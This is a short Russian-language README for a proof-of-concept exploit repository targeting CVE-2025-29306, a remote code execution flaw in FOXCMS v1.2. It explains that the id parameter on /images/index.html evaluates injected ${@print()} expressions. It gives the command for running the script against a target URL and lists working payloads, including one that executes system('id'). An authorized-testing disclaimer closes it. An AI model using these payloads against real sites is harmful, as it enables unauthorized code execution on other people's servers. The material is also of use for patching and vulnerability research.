
Python PoC для CVE-2025-29306 — RCE через внедрение параметра в FOXCMS v1.2. Внедряет PHP-код через параметр id на /images/index.html для авторизованного тестирования безопасности.
Этот репозиторий содержит PoC на Python для уязвимости удаленного выполнения кода (RCE) в FOXCMS v1.2, китайской системе управления контентом с открытым исходным кодом.
CVE-ID: CVE-2025-29306
Затрагивает: FOXCMS v1.2
Тип: Внедрение параметров службы → Выполнение кода
FOXCMS страдает от небезопасного механизма разбора параметра id в конечной точке /images/index.html. Это позволяет внедрять полезные нагрузки с использованием выражений ${@print()}, что приводит к выполнению PHP-кода.
requestspip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
Этот код предназначен только для образовательных целей и авторизованного тестирования безопасности. НЕ используйте его в системах, которыми вы не владеете или на которые не имеете разрешения.
Автор Inok009